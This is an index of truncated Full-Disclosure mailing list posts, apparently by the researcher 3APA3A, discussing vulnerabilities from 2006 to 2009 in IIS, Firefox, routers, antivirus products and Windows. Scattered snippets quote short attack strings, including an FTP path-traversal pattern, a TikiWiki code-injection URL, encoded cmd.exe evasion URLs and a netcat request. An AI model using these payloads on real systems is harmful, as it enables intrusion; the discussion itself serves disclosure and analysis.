Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

./A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n GL> At least on win2k3. Therefore, the workarounds for kb975191 on GL> microsoft.com are wrong. GL> Guido Landi GL> Vladimir '3APA3A' Dubrovin wrote: >> Dear Thierry Zoller, >> >> I think yes, MKDIR

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

Dear Thierry Zoller, I think yes, MKDIR is required. It should be variation of S99-003/MS02-018. fuzzer should be very smart to create directory and user both oversized buffer and ../ in NLST - it makes path longer than MAX_PATH with existing directory. --Monday, August 31, 20

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

Thierry, I think inability of antivirus / intrusion detection to catch something that is not malware/intrusion or malware in the form unused in-the-wild is not vulnerability. Antivirus (generally) gives no preventive protection. They can add signatures for your PoCs to their database

Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface

Dear Shaked Vax, Are you sure Radware Team have analysed reflected attack via user's browser (AppWall administrator visits malcrafted page, page redirects his request to AppWall) before excluding remote vector? --Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure@lists.gr

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

ly by obfuscating a link sent to the >> s> "admin" of the device. this would obviously rely on the admin clicking on >> s> the link, and is more of a phishing / social engineering style attack. >> this >> s> would also rely on the router being setup with

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

Dear Tom Neaves, It still can be exploited from Internet even if "remote management" is only accessible from local network. If you can trick user to visit Web page, you can place a form on this page which targets to router and request to router is issued from victim's browser. --Tuesday

Re: [Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

Dear Jim Parkhurst, It may depend on video card and video drivers and/or amount of memory/video memory. 9 years ago there was vulnerability in Internet explorer with displaying scaled image: http://securityvulns.com/advisories/ie5freeze.asp results

Re: [Full-disclosure] Windows Update (re-)installs outdated Flash ActiveX on Windows XP

Dear Stefan Kanthak, As far as I can see, Internet Explorer actually uses flash10b.ocx. Adobe Flash Player 10.0 r22 --Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com: SK> Windows Update (as well as Microsoft Update and the Automatic Update) SK> installs an outdated (an

Re: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow

Dear iDefense Labs, --Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]: iL> VII. CVE INFORMATION iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in iL> the CVE list (http

Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager

Dear SkyOut, I see no security impact here. RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey); requires administrative privileges. If user has ones, you can achieve better results by deleting task manager of trojaning it. You can also

Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Your Computer (all versions)

Well, I cant' say it's all fake... It's all junk. FD> OpenSSL 0.9.7j FD> openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data FD> copied into fixed length buffer on the stack with no length FD> verification. Buffer overflow in non-suid test application (not compiled by default)

Re: [Full-disclosure] what is this?

Dear Jose Nazario, JN> te file you sent here contains a bunch of embeded nulls (every other JN> character is 00). stripping those out reveals ... jose JN> nazario, ph.d. http://monkey.org/~jose/ This is Little Endian UCS-2 Unicode, not a bunch of embedded nulls.

Re: [Full-disclosure] what is this?

Dear Nick FitzGerald, --Monday, January 14, 2008, 2:52:23 PM, you wrote to full-disclosure@lists.grok.org.uk: NF> U -- the only part of that likely to be relevant here is the last. NF> These kinds of web page "compromises" are typically achieved through NF> bad/ill-configured/non-updated

Re: [Full-disclosure] what is this?

Dear crazy frog crazy frog, Clear your computer from trojan, change FTP password for you site hosting access, because it's stolen, access your hosting account via FTP and remove additional text (usually at the end of the file, after ) from all HTML/PHP pages. --Sunday, January 13,

[Full-disclosure] securityvulns.com russian vulnerabilities digest

n multiple persistant crossite scriptings Original article: http://websecurity.com.ua/1596/ XSS in Math Comment Spam Protection < 2.2 Original article: http://websecurity.com.ua/1576/ XSS in Captcha! <= 2.5d Original article: http://websecurity.com.ua/1588/ -- http://securityvulns.com/ /

[Full-disclosure] multiple CAPTCHA automation test bypass digest

to reCaptcha developers, vulnerability is in Drupal code. Original article: http://websecurity.com.ua/1505/ Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ |

Re: [Full-disclosure] HP Photosmart vulnerabilities

Dear [EMAIL PROTECTED], SNMP is used to monitor printing queue status with LPR or RAW printing protocol. This is standard feature in e.g. Windows and is not HP specific. You can find this option in port settings. --Friday, December 28, 2007, 7:01:40 PM, you wrote to full-disclosure@lis

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

Dear [EMAIL PROTECTED], VKve> Thank you, Captain Obvious - I specifically *said* that only one of them VKve> needs to be blind spoofing. There is a difference between "you needn't" and "you can't" and "you won't". You say you needn't spoof another one. I say you won't and you can't. VKve>

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

Oct 2007 00:43:10 +0400, 3APA3A said: >> Randomized ISN doesn't protect against MitM. VKve> Doing a MitM is basically just spoofing two connections at the VKve> same time. If you know how to do one, you know how to do two. And VKve> if you know how to do one of them *

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

Valdis, you should back to Cretaceous period, because Oliver talks about man-in-the-middle attack, not about blind TCP spoofing. Randomized ISN doesn't protect against MitM. --Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]: VKve> On Thu, 25 Oct 2007 10

[Full-disclosure] 3proxy 0.5.3j released (bugfix)

cal network. -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure -

Re: [Full-disclosure] PDF mailto exploit in the wild

Dear Paul Szabo, Messages like this I've got are PDF spam without attempt to exploit something, and are spammed since July. Not sure about this one though. --Tuesday, October 23, 2007, 4:18:52 PM, you wrote to full-disclosure@lists.grok.org.uk: PS> In case you are interested... messages l

Re: [Full-disclosure] CallManager and OpeSer toll fraud and authentication forward attack

Dear Radu State, As far as I understood the issue, it requires active Man-in-the-Middle attack. Digest authentication, like any authentication without traffic encryption or traffic signing, doesn't protect against active M-i-t-M, because active M-i-t-M can always force client to

Re: [Full-disclosure] Microsoft Windows default ZIP handler bug

Dear Kristian Erik Hermansen, Can not reproduce it on patched Windows XP. May be it's DynaZIP library buffer overflows fixed with MS04-34. --Monday, October 15, 2007, 12:19:31 PM, you wrote to full-disclosure@lists.grok.org.uk: KEH> I tested this on three Windows XP machines and was able to ma

Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW

Dear Moritz Naumann, This vulnerability was found by ShAnKaR http://securityvulns.ru/Sdocument162.html and reported on Bugtraq yesterday (see "Vulnerabilities digest" message). TikiWiki developers were informed on October, 8. --Friday, October 12, 2007, 1:20:06 AM, you wrote to f

[Full-disclosure] Vulnerabilities digest

: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= Original message (in Russian): http://securityvulns.ru/Sdocument162.html Also, multiple vulnerabilities were reported in English by :: iNs @ uNkn0wn.eu

Re: [Full-disclosure] URI handling woes in Acrobat Reader, Netscape, Miranda, Skype

Dear Thierry Zoller, --Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]: TZ> Dear Geo., G>> If the application is what exposes the URI handling routine to untrusted G>> code from the internet, TZ> Sorry, Untrusted code from the internet ? TZ> The user clicks on a mailto l

Re: [Full-disclosure] iDefense Security Advisory 10.02.07: Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability

Dear iDefense Labs, --Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]: iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO iL> without actually removing them from the queue. O

Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)

Dear Panda Security Response, [EMAIL PROTECTED] was contacted about this same vulnerability in Panda Antivirus 2007 on August, 11 2006 (more than year ago) without any results and response, until information was published in Bugtraq. As far, as I can see, pandasecurity.com is Swedish

Re: [Full-disclosure] [USN-515-1] t1lib vulnerability

Dear Kees Cook, CVE-2007-4033 is "Buffer overflow in php_gd2.dll in the gd (PHP_GD2) extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long argument to the imagepsloadfont function." Please, provide valid CVE entry. --Thursday, September 20, 2007,

Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

Dear [EMAIL PROTECTED], Either Subject "UPX parsing Arbitrary CodeExecution" or vulnerability description "Infinite Loop in UPX packed files parsing" are wrong. Can you provide more detailed information please? It's not clear, how infinite loop can lead to remote code execution. --Fri

[Full-disclosure] Vulnerabilities digest

re available from http://securityvulns.com/source13951.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beat

Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

Dear Joey Mengele, Of cause, it's mitigating factor. But: default PATH_MAX under Linux is 4096, and it's not hard to create file/folder with longer path, it's impossible to access it, E.g. folder with path longer than PATH_MAX: bash$ pwd pwd: could not get current directory: get

Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.

Dear Andrew Farmer, And this one is not even new: http://seclists.org/bugtraq/2005/Jul/0521.html --Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]: AF> On 05 Aug 07, at 15:48, Beyond Security wrote: >> /* >> * off by one ebp overwrite in sudo prompt parsing function >> *

Re: [Full-disclosure] HORDE VULNERABILITIES

Dear Mesut EREN, http://securityvulns.com/search/soft.asp?sofname=horde --Thursday, August 2, 2007, 10:09:31 AM, you wrote to full-disclosure@lists.grok.org.uk: ME> Hello everybody ME> The Horde Mail is any have Vulnerability?? ME> I use to Horde Mail i want to test my email system.. Than

[Full-disclosure] [AOGBF] Re: BS.Player 2.22 NULL ptr dereference

Dear [EMAIL PROTECTED], Seems to be Another One George Bush Fan. You know, there is vulnerability in all media players, it can be exploited by opening MP3 file with George Bush bathroom singing. George Bush fans are not vulnerable, yet they are still vulnerable to one you described.

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

Dear coderman, Whhooo! We will not see SPAM any more, because all botnets will be overloaded with hash hacking! --Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]: c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote: >> gotta pay off that copacobana? 10,000 hashes for brea

Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

Dear Tremaine Lea, --Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]: TL> -BEGIN PGP SIGNED MESSAGE- TL> Hash: SHA1 TL> $1-10/hash, and I'd actively seek/support an open source option. 5-10 days for full bruteforce? John-the-ripper on modern multi-core PC. -- ~/ZAR

Re: [Full-disclosure] Signal to Noise Ratio

Dear [EMAIL PROTECTED], --Tuesday, July 24, 2007, 5:02:16 PM, you wrote to full-disclosure@lists.grok.org.uk: jkc> It seems to me the average SNR here could be greatly improved with any jkc> one of several commonly available "community-based" filtering jkc> mechanisms. Digg and Slashdot are b

Re: [Full-disclosure] PIRS2007 local buffer overflow vulnerability

Dear [EMAIL PROTECTED], Please explain why is this "vulnerability" and not "just the bug". --Friday, July 13, 2007, 5:26:17 PM, you wrote to full-disclosure@lists.grok.org.uk: esvnc> TeamIntell discovered local buffer overflow vulnerability esvnc> in PIRS2007 (data collection of companies and

Re: [Full-disclosure] TippingPoint IPS Signature Evasion

Dear Paul Craig, --Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]: PC> http://www.test.com/scripts%c0%afcmd.exe PC> http://www.test.com/scripts%e0%80%afcmd.exe PC> http://www.test.com/scripts%c1%9ccmd.exe PC> Web servers located behind a Tippingpoint IPS device which are c

[Full-disclosure] durito: enVivo!CMS SQL injection

sage (in Russian): http://securityvulns.ru/Rdocument425.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +---

[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure

, . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.ht

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

Dear Jamie Riden, --Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]: JR> (This is what I gathered from the original posting, but I might be wrong.) JR> I think the issue is not that the apache server behaviour is wrong as JR> such, Original BreakingPoint articles author

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

Dear H D Moore, --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to full-disclosure@lists.grok.org.uk: HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \ HDM> nc webserver 80 According to recommendations of RFC 2616, section 4.1 Web server or proxy server should ig

[Full-disclosure] ShAnKaR: Simle machines forum CAPTCHA bypass and PHP injection

forum message. (no further details is given by advisory author). -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ cap

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

:35:17 PM, you wrote to [EMAIL PROTECTED]: k> Btw, k> Here is a screenshot of the effect. k> -Original Message- k> From: kingcope [mailto:[EMAIL PROTECTED] k> Sent: Wednesday, May 23, 2007 10:55 AM k> To: '3APA3A' k> Cc: 'Full-Disclosure'; '[EM

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

# method which checks the path (for example /AUX.aspx is blocked). k> Best Regards, k> Kingcope k> -----Original Message- k> From: 3APA3A [mailto:[EMAIL PROTECTED] k> Sent: Wednesday, May 23, 2007 10:41 AM k> To: kingcope k> Cc: Full-Disclosure; [EMAIL PROTECTED] k> Sub

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope, It's vulnerability regardless of DoS impact, because it allows attacker to access special DOS devices (COM1 in this case). E.g. it could be used to read data from device attached to COM1 or prevent another application from accessing this port (or LPT), because access to ports is ex

[Full-disclosure] Unicode Left/Right Pointing Double Angel Quotation Mark bypass?

%u00ABscript%u00BB in different environments to bypass filtering in this way? -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number

Re: [Full-disclosure] noise about full-width encoding bypass?

Dear Brian Eaton, --Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]: BE> Given how few application platforms decode full-width unicode to ASCII BE> equivalents, is there a case to be made that those application BE> platforms that do decide this conversion is a good idea are bro

Re: [Full-disclosure] noise about full-width encoding bypass?

Dear Brian Eaton, --Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]: BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote: >> It's not true, because it's quite convertible character. At least for IIS: >> >> http://example.com/test.asp?q=%u

Re: [Full-disclosure] noise about full-width encoding bypass?

Dear Brian Eaton, --Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]: BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the BE> conversion from unicode to the code page used by the engine will fail. BE> Either the engine will give up on the query, or it might s

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

Dear Davide Del Vecchio, It's also possible to recover deleted photos from almost any flash card in almost any device (camera, mobile, etc) - it's a way general purpose file systems work. Requirement to delete information securely is enforced in devices certified to e.g. process US mil

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

Dear Tim Brown, --Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]: TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote: >> This vulnerability for D-Link DSL-G624T was already reported by Jose >> Ramon Palanco. See >> >> http://securityvulns.

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

Dear Tim Brown, This vulnerability for D-Link DSL-G624T was already reported by Jose Ramon Palanco. See http://securityvulns.ru/Odocument816.html Previously, same problem was reported for D-Link DSL-G604T by Qex http://securityvulns.ru/Mdocument578.html There were also few more problems r

Re: [Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability

Dear carl hardwick, Do you know examples of phishing sites exploiting this vulnerability? --Wednesday, April 18, 2007, 1:47:03 PM, you wrote to full-disclosure@lists.grok.org.uk: ch> This flaw ch> http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php ch> r

Re: [Full-disclosure] Internet Explorer Crash

Dear carl hardwick, Both Firefox 2.0.0.3 and IE 6.0.2900.2180 resisted (Firefox stops loading page after 500MB of memory, IE warns about script slowing down performance). It's simple memory bomb, probably you are vulnerable because you have <= 512 MB of RAM. --Tuesday, April 17, 20

Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability

Dear Michal Majchrowicz, This feature is not intended to protect against XSS, it's only intended to inform you some information is transmitted in cleartext. You can simply change src="http://server2.com/xss.js to src="https://server2.com/xss.js to avoid this message. --Wednesday, A

Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability

Dear Micha³ Majchrowicz, This image also effectively exploits stack overflow (?) in FastStone Image Viewer 2.8, EIP/EBP is 0x41414141. --Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]: MM> Everytime you try to turn on the slideshow with a JPG file in the MM> folder

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

Dear Tim, --Wednesday, March 21, 2007, 7:24:35 PM, you wrote to full-disclosure@lists.grok.org.uk: T> Secondly, 3APA3A, birthday attacks against the collision-resistance T> property of a hash take approximately 2^(b/2) time, where b is the T> number of bits. That is, brute-force

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

at 160-bits) were 100% secure. The attack BB> under discussion is reported to reduce that to the neighborhood of BB> 60-something bits. BB> I am not a mathematician though, so I would be perfectly willing to BB> believe I was wrong about that. BB>

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

and 3 years after loosing last pencil I may be completely wrong in computations :) --Wednesday, March 21, 2007, 9:48:55 PM, you wrote to [EMAIL PROTECTED]: BB> 3APA3A wrote: >> I know meaning of 'hash function' term, I wrote few articles on >> challenge-respon

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

er calling ability to bruteforce 160-bit hash 2000 times faster 'a crack'? --Wednesday, March 21, 2007, 8:53:27 PM, you wrote to [EMAIL PROTECTED]: BB> 3APA3A wrote: >> First, by reading 'crack' I thought lady can recover full message by >> it's s

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

Dear Michael Silk, First, by reading 'crack' I thought lady can recover full message by it's signature. After careful reading she can bruteforce collisions 2000 times faster. SHA-1 is 160 bit hash. Bruteforced 2000 times faster, it retains the strength of 149-bit hash for bruteforce co

Re: [Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

Dear starcadi, Again, a very effective way for user to exploit himself. How can you elevate your privileges that way? Is dkftpbench suid? --Monday, March 19, 2007, 10:32:27 PM, you wrote to full-disclosure@lists.grok.org.uk: s> Description: s> dkftpbench is an FTP benchmark program inspire

Re: [Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability

Dear starcadi, A very effective way for user to exploit himself. How can you elevate your privileges this way? Is cftp suid? --Tuesday, March 20, 2007, 12:52:13 AM, you wrote to full-disclosure@lists.grok.org.uk: s> Description: s> CFTP is Comfortable FTP, a full screen ftp client. s> Proo

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

Dear Thor (Hammer of God), You are wrong at least for Windows XP/2003. There is a common temporary directory %WINDIR%\Temp It's used as a %TEMP% if application is launched without local logon, e.g. system service. For example, services launched with LocalSystem account will have this

[Full-disclosure] Pre-open files attack agains locked file

|\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and spon

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

Dear Laundrup, Jens, C:\TEMP is not best example, but there are another. Microsoft Word creates temporary file with predictable name in the same directory with document. In the case of directory permissions like: Users: Add & List Creator Owner: Full control (one user should not read documents

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

Dear Michele Cicciotti, --Friday, March 9, 2007, 9:00:05 PM, you wrote to full-disclosure@lists.grok.org.uk: >> Scenario 1.1: >> >> Bob wishes to create "Bob private data" folder in "Public" folder to >> place few private files. "Public" has at least "Write" permissions for >> "User" g

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

Dear Roger A. Grimes, --Friday, March 9, 2007, 6:49:13 PM, you wrote to [EMAIL PROTECTED]: RAG> For one, I've been a sys admin for 20 years and NEVER created a RAG> private folder under a public folder. Nice. What about creating "Sales Reports" folder only head of Sales department has

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

Dear M. Burnett, --Friday, March 9, 2007, 7:12:31 AM, you wrote to [EMAIL PROTECTED]: MB> 3APA3A, I just wanted to say that is very clever research you have done. MB> It's true that this does require some re-thinking of security practices, but MB> I don't think it

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

noted by everyone, but was unnoticed for 10 years. RAG> Roger RAG> * RAG> *Roger A. Grimes, InfoWorld, Security Columnist RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yad

[Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

: 3APA3A, http://securityvulns.com/ Vendor: Microsoft (and potentially another vendors) Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities. Access Vector: Local Type: multiple/complex (weak design, insecure file operations, etc

[Full-disclosure] MOPB-08-2007 - dejavu of dejavu

Hello mopb, phpinfo() crossite scripting http://www.php-security.org/MOPB/MOPB-08-2007.html was initially(?) reported in 2003 by Silent Needle http://securityvulns.com/docs4647.html -- /3APA3A http://securityvulns.com/ ___ Full-Disclosure

Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal

Probably, it's same or related issue for reported by nicob at nicob.net. http://securityvulns.com/news/KIWI/CatTools/DT.html CVE-2007-0888 --Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com: n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.

[Full-disclosure] Few unreported vulnerabilities by SehaTo

. -- /3APA3A http://securityvulns.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak

rver/citrix where all our stored documents can be stolen. AT> In that case, only a software restriction policy will protect us. AT> regards, AT> Andres Tarasco AT> 2007/2/22, 3APA3A <[EMAIL PROTECTED]>: >> >> >> >> Title: Microsoft Wi

[Full-disclosure] Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak

Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable:Yes Type: Remote (from local network), authentication

Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability

Dear Rajesh Sethumadhavan, As Michal Zalewski pointed, there is no "critical" security impact, because you (as attacker) can force browser to open files (it's common thing, you can do it in any browser), but you can not access content of these files. The only security impact in few cases i

Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

Dear Michal Zalewski, Mitigating factor: it doesn't work through proxy, because for proxy URI is sent instead of URL and request will be incomplete. GET http://evil.com --Thursday, February 15, 2007, 1:23:01 AM, you wrote to [EMAIL PROTECTED]: MZ> 'evil.com\x00foo.example.com' to be a part

[Full-disclosure] SecurityVulns.com: Microsoft Visual C++ 8.0 standard library time functions invalid assertion DoS (Problem 3000).

: CVE-2007-0842 Author: 3APA3A, http://SecurityVulns.com/ Advisory URL: http://SecurityVulns.com/advisories/year3000.asp Intro: Since Microsoft Visual Studio 5.0, Visual C++ compiler defaults time_t type to 64 bit integer and time functions to their 64-bit variants. Vulnerability: 64

[Full-disclosure] SecurityVulns.com: HP Network Node Manager remote console weak files permissions

unprivileged user to Local System or another user's account. Author: 3APA3A <[EMAIL PROTECTED]>, http://SecurityVulns.com Advisory URL: http://securityvulns.com/advisories/nnmrc.asp SecurityVulns news URL: http://securityvulns.com/news/HP/NNM/RC/WP.html CVE:CVE-2007-0819

[Full-disclosure] (offtopic) Re: Bluepill's Rutkowska was or is a Man ?!

Dear [EMAIL PROTECTED], --Tuesday, February 6, 2007, 2:17:55 AM, you wrote to full-disclosure@lists.grok.org.uk: whc> I found this in deleted edits on english Wikipedia on Bluepill whc> Vista backdoor security researcher Joanna Rutkowska: whc> http://www.rutkowska.yoyo.pl whc> What is goin

Re: [Full-disclosure] detecting targetted malware

Dear lsi, This approach is already implemented, at least partially, to limit functionality of unknown applications. It can be found in multiple personal firewalls or things like http://www.securesize.com/GeSWall/ There is a better approach - every "good" application should be signed

Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor

Dear XFOCUS Security Team, A more complicated variant of this vulnerability (exhausting all available descriptors and closing standard one) was reported by Joost Pol for BSD systems. It's very funny to see commercial Unix variants were not checked against it and simplest variant of

Re: [Full-disclosure] 0trace - traceroute on established connections

Dear Robert Swiecki, --Sunday, January 14, 2007, 2:49:58 AM, you wrote to bugtraq@securityfocus.com: RS> User-Agent: &*^ VDjh; RS> olsMoasdasdzilla2%$(ls)2=++/-2121%&^#%^@&37.0 (X1230#$(ls)`ls`) RS> asd%^*&%^dasdnhy/ Mnenhy/0.7.4.0 H. It doesn't seems like attempt to exploit

Re: [Full-disclosure] msgina.dll BSOD

Dear /dev/null, To manipulate GINA you need administrative privileges. --Friday, December 29, 2006, 3:34:51 AM, you wrote to full-disclosure@lists.grok.org.uk: dn> Hi, dn> This if from MS forums: dn> http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1 dn> Tested on Windows

Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB

Dear 0o_zeus_o0 elitemexico.org, Thanks, published. http://www.security.nnov.ru/source13365.html --Friday, December 22, 2006, 11:55:17 PM, you wrote to [EMAIL PROTECTED]: 0eo> ### 0eo> # Advisory #15 Title: Multiple Remote

Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

before second free(). --Thursday, December 21, 2006, 11:11:29 PM, you wrote to [EMAIL PROTECTED]: AS> 3APA3A wrote: >> Killer{R} assumes the problem is in strcpy(), because it should not be >> used for overlapping buffers, but at least ANSI implementation of strcpy >> from

Re: [Full-disclosure] Fun with event logs (semi-offtopic)

Dear Michele Cicciotti, --Thursday, December 21, 2006, 6:20:54 PM, you wrote to full-disclosure@lists.grok.org.uk: >> There is interesting thing with event logging on Windows. The only >> security aspect of it is event log record tampering and performance >> degradation, but it may

Re: [Full-disclosure] Fun with event logs (semi-offtopic)

Dear Tim, --Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]: T> 3APA3A, have you tried to see if elements like "%n!FORMAT!" used T> recursively will invoke the wsprintf()-like behavior?? Yes, I did. It doesn't work. -- ~/ZARAZA Но ведь кому

Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

Dear lists, in another Russian forum, Killer{R} made analysis on this issue using Windows 2000 sources: http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672 The problem is in win32k.sys' function GetHardErrorText, which tries to prepare EXCEPTION data for event log, and seems to b

[Full-disclosure] Fun with event logs (semi-offtopic)

sting event log entries if you try something like: net send SOMEHOST %2 or net use \\SOMEHOST\IPC$ /user:%1%2%3 -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatle

[Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

ty.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk

Re: [Full-disclosure] Evasion Schemes or techniques

